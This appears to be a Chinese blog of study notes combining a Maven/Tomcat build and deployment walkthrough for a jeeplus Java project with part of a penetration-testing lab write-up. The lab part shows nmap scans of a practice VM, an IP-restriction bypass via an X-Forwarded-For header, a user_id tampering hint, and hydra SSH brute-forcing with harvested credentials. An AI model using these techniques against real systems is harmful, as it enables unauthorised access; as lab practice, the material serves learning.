^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
██████╗██╗ ██╗ ██████╗ ██╗████████╗██╗ ██╗ ██████╗ ███╗ ██╗
██╔════╝╚██╗ ██╔╝██╔═══██╗██║╚══██╔══╝██║ ██║██╔═══██╗████╗ ██║
██║ ███╗╚████╔╝ ██║ ██║██║ ██║ ███████║██║ ██║██╔██╗ ██║
██║ ██║ ╚██╔╝ ██║ ██║██║ ██║ ██╔══██║██║ ██║██║╚██╗██║
╚██████╔╝ ██║ ╚██████╔╝██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║
╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ (beta)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
by gyoithon.py
=[ GyoiThon v0.0.3-beta ]=
+ -- --=[ Author : Gyoiler (@gyoithon) ]=--
+ -- --=[ Website : https://github.com/gyoisamurai/GyoiThon/ ]=--
扫描完成后,扫描器就会出一个csv的报告查看即可。
以上。
第一步获取Maven构建的项目,只有用Maven构建的java项目,我们才能够Maven进行构建部署。
下面这个是我用来练手的项目。自己也可以到github上找到。
此处Maven环境配置略过。多提一句,这里包括Maven的本地环境变量的配置和本地仓库的配置,自行问度娘。
#PS 进入你自己的Maven项目文件夹,我的是G:\yj-work\java-code\jeeplus-open
PS C:\Users\本阿信> cd G:\yj-work\java-code\jeeplus-open
PS G:\yj-work\java-code\jeeplus-open> ls
目录: G:\yj-work\java-code\jeeplus-open
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020/1/10 16:26 .idea
d----- 2020/1/9 11:03 .settings
d----- 2020/1/9 11:03 src
d----- 2020/1/9 11:03 target
-a---- 2020/1/9 11:03 1350 .classpath
-a---- 2020/1/9 11:03 1444 .project
-a---- 2016/9/4 9:11 10252 LICENSE
-a---- 2016/9/4 9:11 23054 pom.xml
-a---- 2016/9/4 9:11 371 README.md
如上,关键pom属性;
上面可以看到maven构建的pom.xml文件。输入命令mvn help:effective-pom
Maven 将会开始处理并显示 effective-pom。如下:
PS G:\yj-work\java-code\jeeplus-open> mvn help:effective-pom
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-help-plugin:3.2.0:effective-pom (default-cli) @ jeeplus ---
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven-model/3.6.1/maven-model-3.6.1.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven-model/3.6.1/maven-model-3.6.1.pom (4.0 kB at 4.1 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven/3.6.1/maven-3.6.1.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/maven/3.6.1/maven-3.6.1.pom (24 kB at 95 kB/s)
###################################################
################中间具体下载过程略:>##################
###################################################
我把这下面的部分,特意区分出来,方便看的更清楚,当我们对项目进行构建时,我们可以看到项目相关的一些元素。有的时候,当我们还是新手的时候,这样的控制台输出真的会令人激动!@-@
`如下,maven回显出有关于jeeplus的Effective POMs`:
[INFO]
Effective POMs, after inheritance, interpolation, and profiles are applied:
<?xml version="1.0" encoding="GBK"?>
<!-- ====================================================================== -->
<!-- -->
<!-- Generated by Maven Help Plugin on 2020-01-19T15:52:57+08:00 -->
<!-- See: http://maven.apache.org/plugins/maven-help-plugin/ -->
<!-- -->
<!-- ====================================================================== -->
<!-- ====================================================================== -->
<!-- -->
<!-- Effective POM for project 'jeeplus:jeeplus:war:1.0.0-SNAPSHOT' -->
<!-- -->
<!-- ====================================================================== -->
###################################################
######中间具体groupid、artifactid等配置略:>###########
###################################################
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 12.235 s
[INFO] Finished at: 2020-01-19T15:53:00+08:00
[INFO] ------------------------------------------------------------------------
在上面的pom.xml中可以看到 Maven 在执行目标时需要用到的默认工程源码目录结构、输出目录、需要的插件、仓库和报表目录。Maven 的 pom.xml 文件也不需要手工编写。Maven 提供了大量的原型插件来创建工程,包括工程结构和pom.xml。
进入jeeplus项目,根据自己电脑的不同环境,对properties文件进行配置,自定义配置sql数据如\src\main\resources\jeeplus.properties;比如本地运行的为mysql数据库,我单单把mysql数据库的配置代码贴出来,如下:
#mysql database setting
jdbc.type=mysql
jdbc.driver=com.mysql.jdbc.Driver
jdbc.url=jdbc:mysql://localhost:3306/jeeplus_schema?useUnicode=true&characterEncoding=utf-8
jdbc.username=root
jdbc.password=root
把mysql数据库的账号密码设置成本地的数据库账号密码就好,比如我本地的mysql账号密码均为root,填上正确即可,不然会报错。然后打开mysqld,下一步就进行maven构建。
输入mvn test,查看maven构建java项目是否存在报错:
PS G:\yj-work\java-code\jeeplus-open> mvn test
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] Copying 65 resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:compile (default-compile) @ jeeplus ---
[INFO] Changes detected - recompiling the module!
[INFO] Compiling 258 source files to G:\yj-work\java-code\jeeplus-open\target\classes
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 某些输入文件使用或覆盖了已过时的 API。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 有关详细信息, 请使用 -Xlint:deprecation 重新编译。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 某些输入文件使用了未经检查或不安全的操作。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 有关详细信息, 请使用 -Xlint:unchecked 重新编译。
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] skip non existing resourceDirectory G:\yj-work\java-code\jeeplus-open\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:testCompile (default-testCompile) @ jeeplus ---
[INFO] No sources to compile
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ jeeplus ---
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 10.063 s
[INFO] Finished at: 2020-01-19T16:46:53+08:00
[INFO] ------------------------------------------------------------------------
紧接着输入mvn clean package命令;
PS G:\yj-work\java-code\jeeplus-open> mvn clean package
[INFO] Scanning for projects...
[WARNING]
[WARNING] Some problems were encountered while building the effective model for jeeplus:jeeplus:war:1.0.0-SNAPSHOT
[WARNING] 'dependencies.dependency.(groupId:artifactId:type:classifier)' must be unique: javax.servlet.jsp:jsp-api:jar -> version 2.1 vs 2.2 @ line 278, column 21
[WARNING]
[WARNING] It is highly recommended to fix these problems because they threaten the stability of your build.
[WARNING]
[WARNING] For this reason, future Maven versions might no longer support building such malformed projects.
[WARNING]
[INFO]
[INFO] --------------------------< jeeplus:jeeplus >---------------------------
[INFO] Building jeeplusx 1.0.0-SNAPSHOT
[INFO] --------------------------------[ war ]---------------------------------
[INFO]
[INFO] --- maven-clean-plugin:2.5:clean (default-clean) @ jeeplus ---
[INFO] Deleting G:\yj-work\java-code\jeeplus-open\target
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] Copying 65 resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:compile (default-compile) @ jeeplus ---
[INFO] Changes detected - recompiling the module!
[INFO] Compiling 258 source files to G:\yj-work\java-code\jeeplus-open\target\classes
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 某些输入文件使用或覆盖了已过时的 API。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/modules/tools/utils/HttpPostTest.java: 有关详细信息, 请使用 -Xlint:deprecation 重新编译。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 某些输入文件使用了未经检查或不安全的操作。
[INFO] /G:/yj-work/java-code/jeeplus-open/src/main/java/com/jeeplus/common/json/AjaxJson.java: 有关详细信息, 请使用 -Xlint:unchecked 重新编译。
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ jeeplus ---
[INFO] Using 'UTF-8' encoding to copy filtered resources.
[INFO] skip non existing resourceDirectory G:\yj-work\java-code\jeeplus-open\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.3:testCompile (default-testCompile) @ jeeplus ---
[INFO] No sources to compile
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ jeeplus ---
[INFO] No tests to run.
[INFO]
[INFO] --- maven-war-plugin:2.2:war (default-war) @ jeeplus ---
[INFO] Packaging webapp
[INFO] Assembling webapp [jeeplus] in [G:\yj-work\java-code\jeeplus-open\target\jeeplus]
[INFO] Processing war project
[INFO] Copying webapp resources [G:\yj-work\java-code\jeeplus-open\src\main\webapp]
[INFO] Webapp assembled in [19918 msecs]
[INFO] Building war: G:\yj-work\java-code\jeeplus-open\target\jeeplus.war
[INFO] WEB-INF\web.xml already added, skipping
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 38.071 s
[INFO] Finished at: 2020-01-19T16:49:31+08:00
[INFO] ------------------------------------------------------------------------
连着build success!可真是令人激动;我们可以看到maven已经构建好了tomcat部署所需要的war包:[INFO] Building war: G:\yj-work\java-code\jeeplus-open\target\jeeplus.war,直接去对应的绝对路径,把war包ctrl+c到tomcat的webapp文件夹里就好了。
至此部署完毕,对项目查看一下,是否已经部署成功。
多说无益,上代码:
进入tomcat/bin/目录,启动tomcat
PS E:\java\tomcat\apache-tomcat-8.5.50\bin> .\startup.bat
Using CATALINA_BASE: "E:\java\tomcat\apache-tomcat-8.5.50"
Using CATALINA_HOME: "E:\java\tomcat\apache-tomcat-8.5.50"
Using CATALINA_TMPDIR: "E:\java\tomcat\apache-tomcat-8.5.50\temp"
Using JRE_HOME: "C:\Program Files\Java\jdk1.8.0_231\jre"
Using CLASSPATH: "E:\java\tomcat\apache-tomcat-8.5.50\bin\bootstrap.jar;E:\java\tomcat\apache-tomcat-8.5.50\bin\tomcat-juli.jar"
验证是否部署成功:
curl localhost/jeeplus
PS E:\java\tomcat\apache-tomcat-8.5.50\bin> curl localhost/jeeplus
StatusCode : 200
StatusDescription :
Content :
<!DOCTYPE html>
<html>
<head>
<meta name="description" content="User login page" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<script src="/jeeplus...
RawContent : HTTP/1.1 200
Content-Language: zh-CN
Content-Length: 19162
Content-Type: text/html;charset=UTF-8
Date: Sun, 19 Jan 2020 09:23:26 GMT
ParsedHtml : mshtml.HTMLDocumentClass
RawContentLength : 19162
如上,部署成功。返回状态值200。
以上。
上面是Maven创建一个标准化的Java项目,举例:即部署一个maven的项目,我们可以通过上面的方式来进行。更多时候,对于我来说,我高频率使用maven是在对于漏洞的验证和利用阶段,即网上公开的java poc代码诸如此类,显而易见我更倾向于使用java的poc代码而非python代码,由于python语言本身的优势,纵观网上很多python poc在我看来,对于我们理解漏洞原理本身无实际意义,我并不是说python的poc代码不好,而是这门语言太便利了以至于我们可以很方便去复现一个漏洞,这样会导致人们尤其是刚入门的小白很少去思考甚至不思考。
废话不多说,回到本小结上来:
E:\java\hadoop> mvn archetype:generate -D archetypeGroupId=org.apache.maven.archetypes -D groupId=org.conan.myhadoop.mr -D artifactId=myHadoop -D packageName=org.conan.myhadoop.mr -D version=1.0-SNAPSHOT -D interactiveMode=false
回显如下:
[INFO] Scanning for projects...
[INFO]
[INFO] ------------------< org.apache.maven:standalone-pom >-------------------
[INFO] Building Maven Stub Project (No POM) 1
[INFO] --------------------------------[ pom ]---------------------------------
[INFO]
[INFO] >>> maven-archetype-plugin:3.1.2:generate (default-cli) > generate-sources @ standalone-pom >>>
[INFO]
[INFO] <<< maven-archetype-plugin:3.1.2:generate (default-cli) < generate-sources @ standalone-pom <<<
[INFO]
[INFO]
[INFO] --- maven-archetype-plugin:3.1.2:generate (default-cli) @ standalone-pom ---
[INFO] Generating project in Batch mode
[WARNING] No archetype found in remote catalog. Defaulting to internal catalog
[INFO] No archetype defined. Using maven-archetype-quickstart (org.apache.maven.archetypes:maven-archetype-quickstart:1.0)
[INFO] ----------------------------------------------------------------------------
[INFO] Using following parameters for creating project from Old (1.x) Archetype: maven-archetype-quickstart:1.0
[INFO] ----------------------------------------------------------------------------
[INFO] Parameter: basedir, Value: E:\java\hadoop
[INFO] Parameter: package, Value: org.conan.myhadoop.mr
[INFO] Parameter: groupId, Value: org.conan.myhadoop.mr
[INFO] Parameter: artifactId, Value: myHadoop
[INFO] Parameter: packageName, Value: org.conan.myhadoop.mr
[INFO] Parameter: version, Value: 1.0-SNAPSHOT
[INFO] project created from Old (1.x) Archetype in dir: E:\java\hadoop\myHadoop
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 3.491 s
[INFO] Finished at: 2020-02-13T14:35:21+08:00
[INFO] ------------------------------------------------------------------------
PS E:\java\hadoop> cd .\myHadoop\
PS E:\java\hadoop\myHadoop> mvn clean install
[INFO] Scanning for projects...
[INFO]
[INFO] -------------------< org.conan.myhadoop.mr:myHadoop >-------------------
[INFO] Building myHadoop 1.0-SNAPSHOT
[INFO] --------------------------------[ jar ]---------------------------------
[INFO]
[INFO] --- maven-clean-plugin:2.5:clean (default-clean) @ myHadoop ---
[INFO]
[INFO] --- maven-resources-plugin:2.6:resources (default-resources) @ myHadoop ---
[WARNING] Using platform encoding (GBK actually) to copy filtered resources, i.e. build is platform dependent!
[INFO] skip non existing resourceDirectory E:\java\hadoop\myHadoop\src\main\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.1:compile (default-compile) @ myHadoop ---
[INFO] Changes detected - recompiling the module!
[WARNING] File encoding has not been set, using platform encoding GBK, i.e. build is platform dependent!
[INFO] Compiling 1 source file to E:\java\hadoop\myHadoop\target\classes
[INFO]
[INFO] --- maven-resources-plugin:2.6:testResources (default-testResources) @ myHadoop ---
[WARNING] Using platform encoding (GBK actually) to copy filtered resources, i.e. build is platform dependent!
[INFO] skip non existing resourceDirectory E:\java\hadoop\myHadoop\src\test\resources
[INFO]
[INFO] --- maven-compiler-plugin:3.1:testCompile (default-testCompile) @ myHadoop ---
[INFO] Changes detected - recompiling the module!
[WARNING] File encoding has not been set, using platform encoding GBK, i.e. build is platform dependent!
[INFO] Compiling 1 source file to E:\java\hadoop\myHadoop\target\test-classes
[INFO]
[INFO] --- maven-surefire-plugin:2.12.4:test (default-test) @ myHadoop ---
[INFO] Surefire report directory: E:\java\hadoop\myHadoop\target\surefire-reports
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.pom (1.7 kB at 2.0 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-providers/2.12.4/surefire-providers-2.12.4.pom
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-providers/2.12.4/surefire-providers-2.12.4.pom (2.3 kB at 7.4 kB/s)
Downloading from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.jar
Downloaded from alimaven: http://maven.aliyun.com/nexus/content/groups/public/org/apache/maven/surefire/surefire-junit3/2.12.4/surefire-junit3-2.12.4.jar (26 kB at 60 kB/s)
-------------------------------------------------------
T E S T S
-------------------------------------------------------
Running org.conan.myhadoop.mr.AppTest
Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0.02 sec
Results :
Tests run: 1, Failures: 0, Errors: 0, Skipped: 0
[INFO]
[INFO] --- maven-jar-plugin:2.4:jar (default-jar) @ myHadoop ---
[INFO] Building jar: E:\java\hadoop\myHadoop\target\myHadoop-1.0-SNAPSHOT.jar
[INFO]
[INFO] --- maven-install-plugin:2.4:install (default-install) @ myHadoop ---
[INFO] Installing E:\java\hadoop\myHadoop\target\myHadoop-1.0-SNAPSHOT.jar to D:\Workspace\.m2\repository\org\conan\myhadoop\mr\myHadoop\1.0-SNAPSHOT\myHadoop-1.0-SNAPSHOT.jar
[INFO] Installing E:\java\hadoop\myHadoop\pom.xml to D:\Workspace\.m2\repository\org\conan\myhadoop\mr\myHadoop\1.0-SNAPSHOT\myHadoop-1.0-SNAPSHOT.pom
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 6.062 s
[INFO] Finished at: 2020-02-13T14:36:02+08:00
[INFO] ------------------------------------------------------------------------
Maven构建、Gradle构建最近搞得我头痛,天天搬运别人的东西,搬也搬不像。。问题还没有彻底解决,先随手记下。
| 持续更新中 | updating | 2020/01/21以更新 |
师傅最近让我看freebuf上一篇关于jeeplus代码审计的文章,文章讲的是不错的,自己找了个项目来做,之前没有java开发的基础,所以两眼一抹黑,浪费了不少时间,随笔记。
eclipse导入jeeplus项目后,用Maven构建,tomcat部署成功未报错,总是访问不了项目,一直404。 搜索CSDN原答案:
解决如下选中“项目",然后右击选择“properties”Deployment,
然后将webContent项remove掉,还有test相关的文件也可以remove掉,
test是测试相关的文件,add一个folder文件,next->next->src下的main下
的webapp文件,最后击“Finish”,在add一个Java Build Path Entries,next->Maven Dependencies
文件,最后再点击"Finish";最后再点击"OK";
重新启动tomcat,在浏览器中输入相应的地址:http://localhost:8080/MavenTest/index.jsp ,进行测试web项目是否创建成功。
tomcat 没有jar问题
如果你是maven项目,tomcat在发布项目的时候没有同时发布maven依赖所添加的jar包,
你需要设置一下eclipse:
项目 -> 属性 -> Deployment Assembly -> Add -> Java Build Path Entries -> 选择Maven Dependencies -> Finish -> OK
把对应的Maven依赖包也发布到tomcat,调试时会自动把那些jar发布到指定目录下,tomcat也能找到那些jar了。
结合eclipse
mvn eclipse:clean
mvn eclipse:eclipse
##普通Eclipse项目执行 :
mvn eclipse:eclipse Eclipse
##web项目执行 :
mvn eclipse:eclipse –Dwtpversion=1.0
--------------------------------------------------华丽的分割线--------------------------------------------------
小弟之前java学的贼烂,更别说高端的「Maven」构建了,研究了将近一个星期,终于使用Maven构建起第一个Java web项目,按耐不住内心的激动心情,记录下
查看一下靶机ip是多少
root@bin4xin:/usr/share/wordlist# nmap -sP 192.168.3.0/24
Starting Nmap 7.60 ( https://nmap.org ) at 2020-01-08 10:06 UTC
Nmap scan report for _gateway (192.168.3.1)
Host is up (0.0018s latency).
MAC Address: 24:DA:33:2A:53:84 (Unknown)
Nmap scan report for 192.168.3.3
Host is up (0.0023s latency).
MAC Address: 6C:4B:90:33:8A:CC (LiteON)
Nmap scan report for 192.168.3.11
Host is up (0.010s latency).
MAC Address: 1A:DF:41:4B:9D:05 (Unknown)
Nmap scan report for 192.168.3.14
Host is up (0.049s latency).
MAC Address: F4:63:1F:BF:96:DB (Unknown)
Nmap scan report for 192.168.3.17
Host is up (0.010s latency).
MAC Address: 2C:6F:C9:12:7B:42 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.3.30
Host is up (0.010s latency).
MAC Address: 88:B1:11:7D:83:45 (Intel Corporate)
Nmap scan report for 192.168.3.32
Host is up (-0.10s latency).
MAC Address: 68:07:15:D5:46:16 (Intel Corporate)
Nmap scan report for 192.168.3.33
Host is up (-0.094s latency).
MAC Address: 94:87:E0:1B:F2:D5 (Unknown)
Nmap scan report for 192.168.3.34
Host is up (0.010s latency).
MAC Address: F4:60:E2:8B:C8:BC (Unknown)
Nmap scan report for 192.168.3.40
Host is up (0.046s latency).
MAC Address: 24:DF:6A:25:C6:8E (Huawei Technologies)
Nmap scan report for 192.168.3.59
Host is up (0.00033s latency).
MAC Address: 08:00:27:FD:9B:9B (Oracle VirtualBox virtual NIC)
Nmap scan report for bin4xin (192.168.3.60)
Host is up.
Nmap done: 256 IP addresses (12 hosts up) scanned in 5.35 seconds
看到oracle virtual box后缀结尾的,靶机ip为192.168.3.59
扫描一波端口先:
root@bin4xin:/usr/share/wordlist# nmap -A -O 192.168.3.59
Starting Nmap 7.60 ( https://nmap.org ) at 2020-01-08 10:08 UTC
Nmap scan report for 192.168.3.59
Host is up (0.00022s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
| 2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
| 256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_ 256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (EdDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:FD:9B:9B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.3.59
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.64 seconds
中间web部分是一个ip限制的考点,在request头部加上x-forwarded-for:localhost就可以绕过了,之后进去是一个登录页面,大致内容是参数暴露信息的漏洞:
抓用户信息包,如下
GET /?page=index HTTP/1.1
Host: 192.168.3.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
x-forwarded-for:localhost
Connection: close
Upgrade-Insecure-Requests: 1
回显,加上本地头ip后回显正常本地根目录登录页面:
HTTP/1.1 200 OK
Date: Wed, 08 Jan 2020 09:36:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.29
Set-Cookie: PHPSESSID=72l97ppkrc8kgffl3n72dv37f3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 676
Connection: close
Content-Type: text/html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Ceban Corp</title>
<style>
.center {
text-align: center;
}
</style>
</head>
<body>
<div class="center">
<h2>Welcome To Ceban Corp</h2>
<p>Inspiring The People To Great Again!</p>
<hr>
<p><a href="?page=index">Home</a> | <a href="?page=login">Login</a> |
<a href="?page=register">Register</a> | <a href="?page=about">About</a></p>
<hr>
</div>
</body>
</html>
绕过ip限制后,主页注册-登录-修改user_id参数,burpsuite参数截图如下:
hydra爆破ssh 根据web爆出的用户名密码新建user、pass文件,尝试使用海德拉爆破ssh服务:
root@bin4xin:/home/bin4xin# cd /usr/share/wordlist/
root@bin4xin:/usr/share/wordlist# ls
root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist# vi user
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist# ls
user
root@bin4xin:/usr/share/wordlist# vi pass
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist# vi user
root@bin4xin:/usr/share/wordlist# root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist#
root@bin4xin:/usr/share/wordlist#
输入hydra -h查看一下ssh爆破命令:
root@bin4xin:/usr/share/wordlist# hydra -h
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or
for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE]
[-t TASKS] [-M FILE [-T TASKS]] [-w TIME]
[-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services:
adam6500 asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}
-form http-proxy http-proxy-urlenum
icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5]
[s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2
rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp
[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
根据上面的爆破命令,编写爆破命令,代码过程如下:
root@bin4xin:/usr/share/wordlist# hydra -L user -P pass ssh://192.168.3.59
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
